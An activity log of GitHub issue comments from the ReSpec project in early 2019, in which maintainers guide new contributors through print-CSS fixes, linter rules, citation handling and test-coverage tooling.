[2019-01-22 05:30] marcoscaceres commented on #2041
This one just needs to print media rule in:
https://github.com/w3c/respec/blob/develop/assets/caniuse.css

[2019-01-22 09:10] CodHeK commented on #2041
@marcoscaceres can I work on this issue ?

[2019-01-22 09:11] marcoscaceres commented on #2041
@CodHeK, sure! Go for it.

[2019-01-22 09:13] marcoscaceres commented on #2041
@CodHeK let me know if you need a hand or further details. Please see the Developer Guide linked from the README for instructions to get started.

[2019-01-22 09:17] CodHeK commented on #2041
@marcoscaceres  Yes, sure! Also, is the issue about adding "ticks" and "crosses" to the ones that are supported ?

[2019-01-22 09:19] marcoscaceres commented on #2041
Yes, we need to distinguish between them in a meaningful way. If you think there is a better way of doing it, I'm all ears. You might like to take a look at the caniuse.com site for inspiration.

My feeling is that this can all be done in CSS (in the file linked above) - but I'm open to suggestions.

[2019-01-22 09:21] CodHeK commented on #2041
Ok, great!

[2019-01-22 09:21] marcoscaceres commented on #2041
This is how we currently display them on Desktop browsers:

![screenshot 2019-01-22 20 20 34](https://user-images.githubusercontent.com/870154/51524911-42191580-1e83-11e9-8685-be2da512ac38.png)

Note the title attribute there... it's also an option to display that generated content.

[2019-01-22 09:22] marcoscaceres commented on #2041
This might help too: https://css-tricks.com/css-content/

[2019-01-22 09:47] CodHeK commented on #2041
@marcoscaceres or if we could only display the ones it supports ?

[2019-01-22 09:54] marcoscaceres commented on #2041
No, I think it's important to display all of them. The ones that are supported are equally as important as the ones that are not.

[2019-01-22 10:32] pradeepgangwar commented on #1955
@sidvishnoi Is this issue solved? If not then I would like to take this up.

[2019-01-22 10:33] pradeepgangwar commented on #1970
@devanshbatra04 Any update? If your are not working then I would like to take this up.

[2019-01-22 10:35] devanshbatra04 commented on #1970
Not been well at all. I will work on it and the other issues asap. Please have a look other issues. :)

[2019-01-22 11:03] marcoscaceres commented on #2021
@pradeepgangwar, try to only work on one thing at a time. There are plenty of bugs :)

[2019-01-22 11:05] saschanaz commented on #2021
Poking multiple things may lower the response time anyway 😆

[2019-01-22 11:22] pradeepgangwar commented on #2021
Sure @marcoscaceres :). Sorry for spamming. :P

[2019-01-22 13:41] CodHeK commented on #2041
@marcoscaceres any specific version of node required, my `npm install` always get's stuck `extract:rxjs: sill extract @webassemblyjs/helper-fsm@1.7.11`

I am using `node v11.1.0`

[2019-01-22 13:48] marcoscaceres commented on #2041
Hmm... no. That node version should be is fine? Worst case, quickly try Node LTS to see if you get the same error.

[2019-01-22 20:37] CodHeK commented on #2041
@marcoscaceres  What I am planning to do is, display all drop downs with the "tick" or the "cross" and the version, that way we can see which ones are supported when its printed on paper/PDF.

Also, when I am making changes in the css, where do I see the changes ? I mean how can I test the changes made by me ?

[2019-01-22 22:45] marcoscaceres commented on #2041
@CodHeK wrote:

Ok, but to be clear: the Desktop/Mobile versions are fine and  don't need to change. It's only the printed version.

What I do is I run two terminal windows (Bash or whatever). In one I run:

[code]

Which will track the changes:

And in another:

[code]

That will spin up the web server and go to: http://localhost:5000/examples/basic.html. That will load up the bable compiled code

[2019-01-23 04:39] CodHeK commented on #2041
@marcoscaceres  This is what I thought ...
![screenshot 2019-01-23 at 10 07 12 am](https://user-images.githubusercontent.com/22097366/51583507-ea1bf680-1ef6-11e9-9548-affa48b04fe3.png)

The print preview

![screenshot 2019-01-23 at 10 07 27 am](https://user-images.githubusercontent.com/22097366/51583526-0029b700-1ef7-11e9-844d-ee76114074f2.png)

[2019-01-23 05:44] marcoscaceres commented on #2041
Glad to see you got it going!

For print view, it's probably not necessary to expand the columns. Just showing the current one is fine.

The desktop version, it's fine for it to remain as is (i.e., no ticks or crosses).

[2019-01-23 06:11] CodHeK commented on #2041
Okay so, how do you want it to be when it’s printed ? The issue was specifically about adding the ticks and crosses for the case when it was printed ...

On Wednesday, January 23, 2019, 11:14 AM, Marcos Cáceres <notifications@github.com> wrote:

Glad to see you got it going!

For print view, it's probably not necessary to expand the columns. Just showing the current one is fine.

The desktop versi

[2019-01-23 06:42] marcoscaceres commented on #2041
Two options I was thinking about:

<img width="549" alt="screenshot 2019-01-23 17 37 20" src="https://user-images.githubusercontent.com/870154/51587649-8ebd2900-1f35-11e9-8069-73a03e04b829.png">

Alternatively, using CSS generated content, if you use the `title` attribute's value, you can show, for example:

"Almost supported (aka Partial support) in Chrome 67. Supported in Firefox 66. Not support

[2019-01-23 06:44] marcoscaceres commented on #2041
If you got the emoji route: the "✓" emoji is better than the one pictured above.

[2019-01-23 06:44] marcoscaceres commented on #2041
fixed typo above.

[2019-01-23 07:18] CodHeK commented on #2041
@marcoscaceres  Great, got it! Also, if you could confirm out the cases mentioned below when should I print the tick , cross, question mark.

[code]

Because there are cases when there are combination of these in the `title`.

[2019-01-23 07:59] CodHeK commented on #2041
Sent a PR!

- Browser :

![screenshot 2019-01-23 at 1 27 30 pm](https://user-images.githubusercontent.com/22097366/51591375-d4b4c580-1f12-11e9-86eb-d9b52858044e.png)

- When Printing :

![screenshot 2019-01-23 at 1 27 38 pm](https://user-images.githubusercontent.com/22097366/51591403-e9915900-1f12-11e9-88d8-65148817cd02.png)

[2019-01-24 07:00] #2041 closed

[2019-01-24 11:33] CodHeK commented on #1693
@marcoscaceres can I work on this ? Also, if possible could you please elaborate on the issue ?

[2019-01-24 16:04] pradeepgangwar commented on #1352
@marcoscaceres I would like to work on this.

[2019-01-25 03:44] marcoscaceres opened #2045 "div that are of class "note" should have a role="note""
Given:

[code]

It would be great if the `<div>` got a [`role="note"`](https://www.w3.org/TR/wai-aria-1.1/#note) attribute also attached to it.

[2019-01-25 04:01] marcoscaceres opened #2046 "Missing section marker when sections are cited"
Give:

[code]

It would be nice if the output of `<a href="#section1"></a>` would be preceded by a section marker sign (§).... so: "See § 1. The first Section".

[2019-01-27 07:06] nkkumawat commented on #2046
@marcoscaceres assign this to me if no one is working on this.

[2019-01-27 07:48] marcoscaceres commented on #2046
Sure, go for it. However, I wasn’t able to remember which module controls this, so you might need to do some digging. I’d suggest grep’ing for `querySelectorAll` and seeing which are selecting `a` elements. One of them is expanding them out.

[2019-01-27 17:32] nkkumawat commented on #2045
@marcoscaceres can I try this?

[2019-01-27 20:37] marcoscaceres commented on #2045
Sure. This one should be fairly easy too. See “issues-notes.js”.

[2019-01-29 02:55] #2046 closed

[2019-01-29 06:49] CodHeK commented on #1693
@marcoscaceres  I went through the links, isin't it similar to the caniuse module respec already has, only more verbose.

[2019-01-29 07:34] marcoscaceres commented on #1693
Correct, but more accurate as it goes down to the methods and attributes level.

[2019-01-29 07:39] CodHeK commented on #1693
Okay so are we trying to replace caniuse with this for the long run ?

[2019-01-29 10:23] #2033 closed

[2019-01-29 11:48] shreya99oak commented on #2030
@yatri1609 are you still working on it? @marcoscaceres can I work on it?

[2019-01-29 12:06] yatri1609 commented on #2030
@shreya99oak yes I'm working on it you can have a look at other issues

[2019-01-29 12:53] #1834 closed

[2019-01-29 15:47] shreya99oak commented on #2030
Ohk I'll have a look at it!

[2019-01-29 23:42] marcoscaceres commented on #1754
@andrea-peregol,  could you try `class="informative"` on the body:

[code]

That should probably do it... then you won't need `class=informative` on all the `<section>`s.

[2019-01-29 23:48] andrea-perego commented on #1754
Thanks, @marcoscaceres , we will try it out. However, it is still unclear to me why the default is "normative".

[2019-01-29 23:53] marcoscaceres commented on #1754
That's a good question... generally, most docs are specs that are supposed to be REC Track, so we defaulted to everything being Normative.

We might need to change that so that specific kinds of documents default to non-normative, but I've not yet worked out a good way of doing that. I'm open to suggestions tho.

[2019-01-30 00:00] marcoscaceres commented on #1754
Actually, what we could do is if the document has no `<section id="conformance">`, then it's treated as informative. That might solve it.

[2019-01-30 00:01] andrea-perego commented on #1754
Thanks, @marcoscaceres , this clarifies things.

Just thinking aloud, but another option could be to check in config.js whether a doc is or not on REC track to decide which should be the default. Said that, in my experience, if there are normative sections, people take care of specifying this explicitly - also because there will be informative sections as well. So, I wonder whether it would be bet

[2019-01-30 00:05] marcoscaceres commented on #1754
I thought the same... then I remembered:
http://github.com/w3c/payment-method-basic-card

(Not on Rec Track, but lots of Normative requirements... don't get me started :))

For all specs, I think the declaration of the `<section id=conformance>` actually solves this explicitly, because it states:

      diagrams, examples, and notes in this specification are non-normative.
      Everything else in

[2019-01-30 00:08] andrea-perego commented on #1754
+1 from me

[2019-01-30 00:10] marcoscaceres commented on #1754
Ok cool. Filing a bug now. Will cc you and get this fixed ASAP.

[2019-01-30 00:11] andrea-perego commented on #1754
Thanks!

[2019-01-30 00:15] marcoscaceres opened #2051 "If a spec lacks <section id=conformance>, then it reference should be informative"
## Important info

* URL to affected spec:
https://w3c.github.io/dxwg/ucr/

## Description of problem
Specs can have either Informative or Normative references. By default, ReSpec treats all documents as if they were Normative. However, some documents, like Use Cases docs, generally are don't use Normative references.

But what I was expecting?:
The citations in a document that doesn't declare a c

[2019-01-30 00:20] marcoscaceres commented on #1754
We have a lot o students contributing to ReSpec at the moment, so I'll guide one of them to how to fix this for us. If you don't mind, it usually takes them 2-3 days (would probably take the core team a few mins to fix), but they gain a lot out of the experience. Hope the delay is ok. If you prefer not to wait, just do the `<body class="informative">` suggestion above, as fix will do exactly the s

[2019-01-30 00:48] #2034 closed

[2019-01-30 00:51] marcoscaceres commented on #2030
@shreya99oak, this one just came up:
https://github.com/w3c/respec/issues/2051

It's a relatively easy one, but super useful/important. Do you think you could take it on?

[2019-01-30 00:53] marcoscaceres commented on #2051
I've asked @shreya99oak if they can work on this. @shreya99oak, if you can, I can provide you with additional guidance. If you haven't already, please get set up by reading the README and follow the link there to the Developer Guide.

[2019-01-30 01:16] shreya99oak commented on #2051
I'll work on this! Yeah, additional guidance would do:)

[2019-01-30 04:59] CodHeK commented on #1051
@marcoscaceres meanwhile can I work on this issue ?

[2019-01-30 05:49] marcoscaceres commented on #1051
@CodHeK sure, that would be great! However, it's a fairly challenging one tho. You'll have to do a fair bit of investigating different parts of ReSpec to get it to work... basically, what should come out is a dynamically generated Dependencies section that looks something like this:

https://w3c.github.io/screen-orientation/#dependencies

Or this:
https://www.w3.org/TR/payment-request/#dependencie

[2019-01-30 06:03] marcoscaceres commented on #1693
Maybe... caniuse is great if as a web developer you want to know if you can rely on a whole feature (and it's also "other developers says I can use this safely"). The MDN data is a bit more specific - it's targeted at both web developers and browser developers. Like, I can see specifically which version supports a particular method.

Maybe in the long run they will converge, but for now it's ok fo

[2019-01-30 07:06] andrea-perego commented on #1754
No problem.

[2019-01-30 12:55] andrea-perego opened #2052 "Problem with WSDL "latest version" URLs"
Just discovered using SpecRef.

Searching for `wsdl` in SpecRef (http://api.specref.org/bibrefs?refs=wsdl) returns what follows:

[code]

The issue is that https://www.w3.org/TR/wsdl is not pointing to WSDL 1.1, but to WSDL 2.0 Part 1 (which is not a Note, but a Recommendation).

[2019-01-30 12:58] marcoscaceres commented on #2052
hmm... does this mean it should be fixed at https://github.com/tobie/specref/ ? ReSpec just renders whatever specref gives back to us.

[2019-01-30 15:28] AutomatedTester opened #2053 "can't install respec"
## Important info

* URL to affected spec: https://travis-ci.org/w3c/webdriver/builds/486466970?utm_source=github_status&utm_medium=notification
* ReSpec version: latest, see travis.yml
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

What happened (e.g., it crashed)?: npm failed to install highlight.js because of missing sha

But what I was expecting?: it to instal

[2019-01-30 16:27] andrea-perego commented on #2052
Yes, but the W3C entries in SpecRef are provided by W3C itself.

I think the main question is whether it is correct that

https://www.w3.org/TR/wsdl

redirects to

http://www.w3.org/TR/2007/REC-wsdl20-20070626

instead of

https://www.w3.org/TR/2001/NOTE-wsdl-20010315

[2019-01-30 23:41] shreya99oak commented on #2051
Thanks!

[2019-01-31 01:45] marcoscaceres commented on #2053
Oops! on it!

[2019-01-31 02:06] #2053 closed

[2019-01-31 02:32] #2045 closed

[2019-01-31 05:52] marcoscaceres commented on #2052
I see what you mean... the entry is wrong. It should be the REC.

@tobie, is the W3C providing us with the wrong data?

[2019-01-31 08:31] andrea-perego commented on #2052
@marcoscaceres , I'm not sure it's SpecRef. If you check WSLD 1.1

https://www.w3.org/TR/2001/NOTE-wsdl-20010315

the spec indicates as URL of the latest version the following one

https://www.w3.org/TR/wsdl

So, IMO, SpecRef returns the correct information. The issue is that https://www.w3.org/TR/wsdl points to WSDL 2.0, and not to WSDL 1.1, as it should.

[2019-01-31 08:40] CodHeK commented on #1051
@marcoscaceres I did a bit fair of searching, I understood how data-cite works to generate the href link to the specified location ( mentioned in the `data-cite` attribute ) but I still am not sure about what you said about dependencies,  as in how is it related to generating dependencies ? Also, what all data needs to be in the `cite-summary` section ?

[2019-01-31 08:51] CodHeK opened #2056 "MDN bar overshawdows text"
![screenshot 2019-01-31 at 2 17 48 pm](https://user-images.githubusercontent.com/22097366/52042455-399b9b80-2563-11e9-9b69-7eb2d93dcfbe.png)
## Important info

* URL to affected spec: [link](https://html.spec.whatwg.org/multipage/interaction.html#gains-focus)
* ReSpec version: Click the ReSpec pill (e.g., 20.0.1).
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

Wha

[2019-01-31 09:32] tobie commented on #2052
Well, if this is objectively wrong, we can always override stuff in Specref.

[2019-01-31 09:33] tobie commented on #2052
See https://github.com/tobie/specref/blob/master/overwrites/w3c.json.

[2019-01-31 09:37] marcoscaceres commented on #2052
Ah, I didn't know we had that override... IMO it's definitely wrong. Following the link (https://www.w3.org/TR/wsdl) takes you to a W3C Recommendation... that's a pretty big difference to what's there.

[2019-01-31 09:43] tobie commented on #2052
PR… pretty please?

![image](https://user-images.githubusercontent.com/3392/52045513-f7fbf800-2544-11e9-8d11-9e2f539e302b.png)

[2019-01-31 10:10] marcoscaceres commented on #2052
heh, dunno, but it was a good one :D

[2019-01-31 11:50] sidvishnoi commented on #2056
Closing as not an issue with ReSpec. HTML spec doesn't use ReSpec.

[2019-01-31 11:50] #2056 closed

[2019-02-01 02:42] marcoscaceres commented on #2056
Thanks @sidvishnoi.

I'm cc'ing @sideshowbarker so he is aware of the bug (as he authored that MDN box, I believe). Mike, should we transfer this issue somewhere for you?

[2019-02-01 05:03] marcoscaceres commented on #1051
So, let's imagine a simple case. As a spec editor, I only want to write:

[code]

Now, I would expect ReSpec to generate something like this:

[code]

With the above all appropriately linked.

[2019-02-01 07:18] kajalbh99 commented on #1025
@dduuu thank you. After wasting a long time . I have resolved this issue on IE 11.

[2019-02-01 10:55] sideshowbarker commented on #2056
I am aware of the issue and will be making time soon to rework how the MDN annotations in the HTML spec are presented.

But in the mean time, note that to view the underlying text, you can collapse the entire annotation down to just width of the **MDN** text, all the way over to the right margin.

To make the annotation collapse that way, click inside the upper left-hand corner of the annotation,

[2019-02-01 16:22] iherman commented on #1855
@marcoscaceres I made some hack for our case (it is much simpler because the idl contains enums and dictionaries only); the only real hack is to take the output of the webidl parser and combine things (and some extra tricks to pretty print WebIDL which, I would think, respec does also somewhere. But I have no idea how to incorporate that into respec; I was looking at the webidl-index file and I do

[2019-02-01 18:17] greenkeeper[bot] opened #2059 "An in-range update of eslint is breaking the build 🚨"
## The devDependency [eslint](https://github.com/eslint/eslint) was updated from `5.12.1` to `5.13.0`.

🚨 [View failing branch](https://github.com/w3c/respec/compare/develop...w3c:greenkeeper%2Feslint-5.13.0).

This version is **covered** by your **current version range** and after updating it in your project **the build failed**.

eslint is a devDependency of this project. It **might not break yo

[2019-02-02 01:09] saschanaz opened #2061 "Add unit test for respec2html"
I would like to see tests for issues like #2057.

[2019-02-02 01:41] #2059 closed

[2019-02-02 04:24] saschanaz opened #2062 "Emit all errors/warning when with `-e -w`"
Currently respec2html with `-e -w` halts when it meets the first error or warning message. It should instead emit all messages and then halt, so that the author can fix all things at once.

[2019-02-02 05:07] saschanaz opened #2063 "Linter message does not affect respec2html"
## Important info

* URL to affected spec: https://github.com/w3c/media-source/blob/gh-pages/media-source-respec.html
* ReSpec version: develop
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

What happened (e.g., it crashed)?:

Running respec2html against the document does not show linter warnings.

But what I was expecting?:

It should be shown so that `-w` can ha

[2019-02-02 15:54] saschanaz commented on #2063
Now I can't see any linter issue there anymore. Confused... Will reopen I see this again.

[2019-02-02 15:54] #2063 closed

[2019-02-03 05:09] saschanaz commented on #2062
@EvsChen Sure! Feel free to ask questions if needed.

[2019-02-03 09:47] CodHeK commented on #1051
@marcoscaceres  okay, so every cited link in the section needs to be added in the dependencies in the `cite-summary` section ?

[2019-02-03 10:00] marcoscaceres commented on #1051
Yep, except if the document is citing itself. But any outside citation should appear there.

[2019-02-03 19:59] CodHeK commented on #1051
@marcoscaceres if possible could you please help me with the flow, I am trying to understand how `data-cite` is working and how the cites are being distinguished and added to the document as normative or informative.

[2019-02-04 05:11] CodHeK commented on #1051
This issue looks more like merging `normative` and `informative` sections containing tags which reference external docs into a dependencies sections, isin't it ?

Also, I believe I need to re-write `render-biblio.js` somehow to produce `cite-summary`, since that's where the HTML for the references section is being rendered right?

Theres this thing `conf.something` in many places ( for eg: `conf.n

[2019-02-04 09:19] CodHeK commented on #672
@marcoscaceres can I still work on this, is it just moving the css file ?

[2019-02-04 11:39] CodHeK commented on #672
This [https://github.com/w3c/respec/blob/develop/assets/issues-notes.css#L31](https://github.com/w3c/respec/blob/develop/assets/issues-notes.css#L31) looks redundant same as this -> [https://github.com/w3c/tr-design/blob/gh-pages/src/base.css#L637](https://github.com/w3c/tr-design/blob/gh-pages/src/base.css#L637)

[2019-02-04 11:56] marcoscaceres commented on #672
Not, there is also redundancy in the .notes and possibly other things. Any little bit you can remove would really help.

[2019-02-04 12:32] deniak commented on #1443
@marcoscaceres it seems respec is generating the old patent policy text again for Notes, e.g. [charmod](https://labs.w3.org/spec-generator/?type=respec&url=https://w3c.github.io/charmod-norm/%3FspecStatus%3DWG-NOTE).

The following sentences should be there:
[code]

[2019-02-04 13:04] marcoscaceres commented on #1443
Will take a look and get that fixed ASAP!

[2019-02-04 17:07] CodHeK commented on #672
@marcoscaceres I couldn't find any other redundancy in `issues-notes.css` and `base.css` except the one I mentioned above .

[2019-02-04 20:33] yatri1609 commented on #2030
@marcoscaceres The title must be "Preview of PR xxx: " instead of "This is a preview of pull request `PR number`. Am I understanding it correct?

[2019-02-04 22:43] ThobyV commented on #2061
Hello guys, I'm a Gsoc Aspiring student and UX Engineer. My name is Thoby. I am looking to Contribute to respect and help out with little Jobs and as I get familiar with codebase I wish to do more.

Do you think this is a good first issue for me which I can be assigned to? I am willing to work hard and learn more. I think I have a better chance as I am quiet good with JavaScript.

[2019-02-05 01:08] gkellogg opened #2064 "ReSpec intercepting button onclick?"
## Important info

* URL to affected spec: https://w3c.github.io/json-ld-syntax
* ReSpec version: Click the ReSpec pill (e.g., 20.0.1). 24.2.5
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

The spec uses an "onclick" in buttons used for tabbing in examples (e.g., [example 3](https://w3c.github.io/json-ld-syntax/#example-3-sample-json-ld-document-using-full-iris-in

[2019-02-05 01:08] gkellogg commented on #2064
cc/ @iherman

[2019-02-05 02:32] yatri1609 commented on #2030
@marcoscaceres great I'll do that !

[2019-02-05 03:30] marcoscaceres opened #2065 "Suggest removal of redundant config options"
## Important info

* URL to affected spec:
https://w3c.github.io/payment-request/

## Description of problem
ReSpec users generally copy/paste the "respecConfig". What would be nice is that for config values that are already on by default (in core/default or w3c/default), ReSpec should warn that those should be removed from the configuration.

This depends on :
https://github.com/w3c/respec/pull/2

[2019-02-05 04:43] marcoscaceres commented on #1443
@deniak, I'm confused. I see:

In that spec? What old text are you seeing?

[2019-02-05 04:45] marcoscaceres commented on #1443
Screenshot from generated [charmod](https://labs.w3.org/spec-generator/?type=respec&url=https://w3c.github.io/charmod-norm/%3FspecStatus%3DWG-NOTE) :

![screenshot 2019-02-05 15 44 14](https://user-images.githubusercontent.com/870154/52253570-ea87a900-295c-11e9-9cb6-b89f122f827c.png)

[2019-02-05 04:47] marcoscaceres commented on #1443
oh, sorry, that _is_ the old text. Did you mean "The following sentences should **NOT** be there:"?

[2019-02-05 05:21] saschanaz commented on #2065
Is that behavior generally preferred? I think explicit values ensures that the local settings would never be affected by upstream changes.

[2019-02-05 05:45] deniak commented on #1443
oups, indeed. The sentences should **NOT** be there. The expected paragraph for Notes is
[code]

[2019-02-05 08:07] CodHeK commented on #672
@marcoscaceres https://github.com/w3c/respec/pull/2070 sent a PR!

[2019-02-05 08:42] CodHeK commented on #873
@saschanaz any work that needs to be done here, maybe I can try doing this issue ?

[2019-02-05 08:48] saschanaz commented on #873
Hello @CodHeK!

We want to add a file in `src/core/linter-rules` that checks the document has `<meta charset="utf-8" />` properly. A linter warning message should be shown if it's absent or there is non-UTF-8 charset declaration instead.

Checking out existing linters e.g. [local-refs-exist](https://github.com/w3c/respec/blob/develop/src/core/linter-rules/local-refs-exist.js) may help you understa

[2019-02-05 08:51] CodHeK opened #2071 "New field under the participate header called `Contribute`"
## Description of problem

![screenshot 2019-02-05 at 2 17 39 pm](https://user-images.githubusercontent.com/22097366/52261968-1309a600-2951-11e9-8191-c18f92859f81.png)

We could add a new field `Contribute` that could redirect the user directly to the APIs contribution guide / developer's guide.

[2019-02-05 08:55] CodHeK commented on #873
@saschanaz okay, great! I'll do a bit of checking and get back if I have any doubts!

[2019-02-05 09:02] CodHeK commented on #873
@saschanaz looking at the existing linters gives me a fair idea of how to proceed, but how do I test them as an when I write the code for the linter ?

[2019-02-05 09:06] saschanaz commented on #873
@CodHeK You can test it somehow like this: https://github.com/w3c/respec/blob/bd65955f036e1912f932ac4188cdff5c4a65780a/tests/spec/core/linter-rules/local-refs-exist-spec.js

Note that you have to register your new linter in src/w3c/defaults.js first before any test.

[2019-02-05 13:33] marcoscaceres commented on #2071
Unfortunately, I don’t know of any specs that have such a guide. Do you have an example you are thinking of?

[2019-02-05 14:01] zerefwayne commented on #2065
@marcoscaceres Can I work on this issue? I'm new to pdf.js

[2019-02-05 14:02] CodHeK commented on #2071
I figured if there is an option to `file a bug` there must be some way to contribute as well

[2019-02-05 14:07] marcoscaceres commented on #2071
Generally, we rely on the first link as the way people get to a repo’s readme. The problem with contributing to standards is that it’s a bit nontrivial: people have to sign things, others have to pay a bunch of money, etc.... so the easiest way is for people to “file a bug” as per the link above .

[2019-02-05 14:58] marcoscaceres commented on #2052
Closing, as this was specref issue.

[2019-02-05 14:58] #2052 closed

[2019-02-05 15:55] saschanaz opened #2074 "Explore why eslint on Travis is too permissive"
From https://github.com/w3c/respec/pull/2073#issuecomment-460691098.

[2019-02-06 02:11] #2023 closed

[2019-02-06 02:16] marcoscaceres commented on #2065
Heh, good recovery (pdf.js 👀😁). Sure, please get set up by reading the developer guide - link is in the README.

[2019-02-06 04:58] CodHeK commented on #873
@saschanaz should the link add the meta tag by it's own to the doc if not present ? or change it to utf-8 if it's something else ?

[2019-02-06 06:32] CodHeK commented on #873
@saschanaz please review the PR for the linter https://github.com/w3c/respec/pull/2075

[2019-02-06 07:52] saschanaz commented on #2074
I tried some back and forth on my own branch and found that eslint on Travis works correctly for src/core but not for src/core/linter-rules. Maybe some directory glob problem, but not sure why as we use same glob pattern on both Travis and local.

[2019-02-06 08:01] marcoscaceres commented on #2074
Maybe OS level thing?

[2019-02-06 08:12] saschanaz commented on #2074
@marcoscaceres Yes, it seems so... turns out that quoting helps. 🤦‍♀️

https://medium.com/@jakubsynowiec/you-should-always-quote-your-globs-in-npm-scripts-621887a2a784

[2019-02-06 08:36] pradeepgangwar commented on #1582
I would like to try this one as my next issue, if no one is currently working on this.

[2019-02-06 09:52] #2074 closed

[2019-02-06 16:03] marcoscaceres opened #2078 "Linter rule to check for non-en-US english in IDL"
See this Twitter thread:
https://twitter.com/marcosc/status/1093151940769341440?s=20

In W3C docs/specs, we should check WebIDL attributes and operation identfiers are in US English.

I wonder if there is some way of doing it? Need to research.

[2019-02-06 16:08] marcoscaceres commented on #2078
Maybe https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/i18n/detectLanguage

[2019-02-06 16:16] #1670 closed

[2019-02-06 21:32] CodHeK commented on #2078
@marcoscaceres can I try this ?

[2019-02-07 04:08] saschanaz commented on #2078
@marcoscaceres That's a WebExtensions API but ReSpec is not an extension 😅

[2019-02-07 04:17] saschanaz commented on #2064
I think #2050 is the culprit.

[2019-02-07 04:28] marcoscaceres commented on #2078
Oh whoops... totally missed that. I was wondering how I'd missed that API... would have been a "too good to be true" addition to the web :)

[2019-02-07 04:35] #1352 closed

[2019-02-07 09:23] #873 closed

[2019-02-07 10:19] CodHeK commented on #2078
@marcoscaceres can we use this: [https://www.npmjs.com/package/languagedetect](https://www.npmjs.com/package/languagedetect ) ?

[2019-02-07 10:23] saschanaz commented on #2078
@CodHeK I don't think we want to add a 200+ KiB dependency.

[2019-02-07 10:59] CodHeK commented on #2078
@saschanaz could you please help me find where the `WebIDL attributes and operation identfiers` are ?

[2019-02-07 11:02] saschanaz commented on #2078
https://github.com/w3c/respec/blob/d451e5efb187ba3b62205998fa0e12606a5a21f1/src/core/webidl.js#L114-L130

@CodHeK Here, but what are you going to do?

[2019-02-07 11:10] CodHeK commented on #2078
@saschanaz I am just trying to understand what the issue is about and see if we could do anything ...

[2019-02-07 11:19] CodHeK commented on #2078
@saschanaz what are the attributes/identifier here which need to be checked for the language ?

[2019-02-07 11:23] saschanaz commented on #2078
@CodHeK `data.name` should be checked there as that presents IDL identifiers. I think `data.name` is enough.

[2019-02-07 11:27] CodHeK commented on #2078
You mean the variable name at [L119](https://github.com/w3c/respec/issues/2078#L119)

[2019-02-07 11:29] marcoscaceres commented on #2078
I think this might be impossible to do reliably... @CodHeK, before looking at code, check if it's even possible at all without an actual *real* dictionary. I just don't think it is, because, for example:

[code]

So we would need some kind of dictionary lookup.... unless there is some actual Dictionary API on the web we would use, but that seems a bit extreme.

[2019-02-07 11:51] greenkeeper[bot] opened #2081 "An in-range update of snyk is breaking the build 🚨"
## The dependency [snyk](https://github.com/snyk/snyk) was updated from `1.125.0` to `1.126.0`.

🚨 [View failing branch](https://github.com/w3c/respec/compare/develop...w3c:greenkeeper%2Fsnyk-1.126.0).

This version is **covered** by your **current version range** and after updating it in your project **the build failed**.

snyk is a direct dependency of this project, and **it is very likely causi

[2019-02-07 12:07] CodHeK commented on #2078
I got two packages, `typo-js` (83kb)  and `check-word` (3kb) they both seem pretty lightweight, we could use them I guess

[2019-02-07 12:10] marcoscaceres commented on #2078
ok, 83kb is way too massive... and looks like check-word doesn't give us the precision :(

https://github.com/S0c5/node-check-word/blob/master/index.js#L8

[2019-02-07 12:12] saschanaz commented on #2078
`check-word` is not 3 KiB as its dictionaries are already 37 MiB.

[2019-02-07 12:12] marcoscaceres commented on #2078
heh, yeah: https://raw.githubusercontent.com/S0c5/node-check-word/master/word-regexes/en-regex.js

[2019-02-07 12:13] marcoscaceres commented on #2078
it has the whole dictionary. That's awesome :) lol..

I think I'm going to close this.

[2019-02-07 12:13] #2078 closed

[2019-02-07 12:32] CodHeK commented on #2061
@saschanaz can I take this as my next issue ?

[2019-02-07 12:34] saschanaz commented on #2061
I'm not sure how complex this would be. I would recommend easier ones as https://github.com/w3c/respec/issues/2061#issuecomment-460466674 said.

[2019-02-07 12:34] saschanaz commented on #2061
But if you like an adventure, sure 😄

[2019-02-07 12:41] CodHeK commented on #2061
@saschanaz I'll try doing this, since most of the `good-first-issues` are taken up ... if possible could you could tell me little bit more about this issue

[2019-02-07 12:46] saschanaz commented on #2061
@CodHeK Some issues are taken up but have been silent for months. I think you can take one of them.

[2019-02-07 12:50] marcoscaceres commented on #672
closed via #2070

[2019-02-07 12:50] #672 closed

[2019-02-07 12:55] marcoscaceres commented on #1055
closed thanks to #2058

[2019-02-07 12:55] #1055 closed

[2019-02-07 12:58] CodHeK commented on #2061
Alright , I’ll find one and claim ...

Sent from Yahoo Mail for iPhone

On Thursday, February 7, 2019, 6:16 PM, Kagami Sascha Rosylight <notifications@github.com> wrote:

@CodHeK Some issues are taken up but have been silent for months. I think you can take one of them.

—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub, or mute the thread.

[2019-02-07 13:01] marcoscaceres commented on #2061
@CodHeK how about this one: https://github.com/w3c/respec/issues/631 ... we've wanted to do code coverage for a really long time, but we've not found time to do it? That one will allow us to find testing gaps and possibly lots of new bugs and gaps in our testing.

[2019-02-07 13:11] CodHeK commented on #2061
@marcoscaceres great! I'll get started with this then!

[2019-02-07 13:13] CodHeK commented on #631
@marcoscaceres [this](https://codeclimate.com/quality/) is the one right ?

[2019-02-07 13:15] CodHeK commented on #2061
@marcoscaceres  Also, I was thinking if we can add a pre-commit hook that check for linting errors, it's really useful and saves unnecessary commits

[2019-02-07 13:15] marcoscaceres commented on #2061
@CodHeK, can you evaluate a few options for us? I don't know what the best solution is... so having a look at a few choices, reading a few blog posts as to why one is better than another, who is using which tool, etc. would really help. We need to make a choice on a project that we will rely on for 5 to 10 years, so the choice needs to be carefully weighed.

[2019-02-07 13:16] marcoscaceres commented on #2061
Sure. I have my own here locally... but I'm open to suggestions.

[2019-02-07 13:19] marcoscaceres commented on #631
yep, but it's one of many.

[2019-02-07 13:19] CodHeK commented on #2061
@marcoscaceres [https://github.com/okonet/lint-staged](https://github.com/okonet/lint-staged) this works really well, we can add the hook using `husky`

[2019-02-07 13:32] CodHeK commented on #631
`Codacy` is already being used as a code quality tool right ?

[2019-02-07 13:43] marcoscaceres commented on #631
yes, but Codacy doesn't tell us what is being tested by our test suite... can it?

just talking to a friend of mine, she is telling me https://jestjs.io might be compatible with our setup - as our test suite is based on Jasmine.

[2019-02-07 13:47] CodHeK commented on #631
hm..oh, yes! This looks nice, maybe we can try this!

[2019-02-07 13:49] marcoscaceres commented on #631
